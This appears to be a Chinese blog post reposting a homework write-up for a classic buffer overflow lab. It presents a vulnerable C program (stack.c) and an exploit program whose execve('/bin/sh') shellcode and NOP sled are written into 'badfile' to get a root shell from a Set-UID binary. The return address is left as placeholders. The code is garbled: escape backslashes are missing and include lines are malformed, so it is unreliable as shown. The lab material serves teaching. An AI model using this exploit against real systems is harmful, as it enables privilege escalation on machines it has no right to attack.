ch03 课下作业

优速盾-小U • 2024年4月3日 13:11 • 网站百科 • 阅读 66

初始设置
Ubuntu 和其他一些 Linux 系统中，使用地址空间随机化来随机堆（heap）和栈（stack）的初始地址，这使得猜测准确的内存地址变得十分困难，而猜测内存地址是缓冲区溢出攻击的关键。

此外，为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击，许多shell程序在被调用时自动放弃它们的特权。因此，即使你能欺骗一个 Set-UID 程序调用一个 shell，也不能在这个 shell 中保持 root 权限，这个防护措施在 /bin/bash 中实现。

输入命令 linux32 进入32位linux环境。

漏洞程序
stack.c

/* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task is to exploit this vulnerability */ /#include <stdlib.h> /#include <stdio.h> /#include <string.h> int bof(char *str) { char buffer[12]; /* The following statement has a buffer overflow problem */ strcpy(buffer, str); return 1; } int main(int argc, char **argv) { char str[517]; FILE *badfile; badfile = fopen("badfile", "r"); fread(str, sizeof(char), 517, badfile); bof(str); printf("Returned Properlyn"); return 1; }

编译

攻击程序 /* exploit.c */ /* A program that creates a file containing code for launching shell*/ /#include <stdlib.h> /#include <stdio.h> /#include <string.h> char shellcode[] = "x31xc0" //xorl %eax,%eax "x50" //pushl %eax "x68""//sh" //pushl $0x68732f2f "x68""/bin" //pushl $0x6e69622f "x89xe3" //movl %esp,%ebx "x50" //pushl %eax "x53" //pushl %ebx "x89xe1" //movl %esp,%ecx "x99" //cdq "xb0x0b" //movb $0x0b,%al "xcdx80" //int $0x80 ; void main(int argc, char **argv) { char buffer[517]; FILE *badfile; /* Initialize buffer with 0x90 (NOP instruction) */ memset(&buffer, 0x90, 517); /* You need to fill the buffer with appropriate contents here */ strcpy(buffer,"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x??x??x??x??"); //在buffer特定偏移处起始的四个字节覆盖sellcode地址 strcpy(buffer + 100, shellcode); //将shellcode拷贝至buffer，偏移量设为了 100 /* Save the contents to the file "badfile" */ badfile = fopen("./badfile", "w"); fwrite(buffer, 517, 1, badfile); fclose(badfile); }

gdb调试攻击程序
输入disass main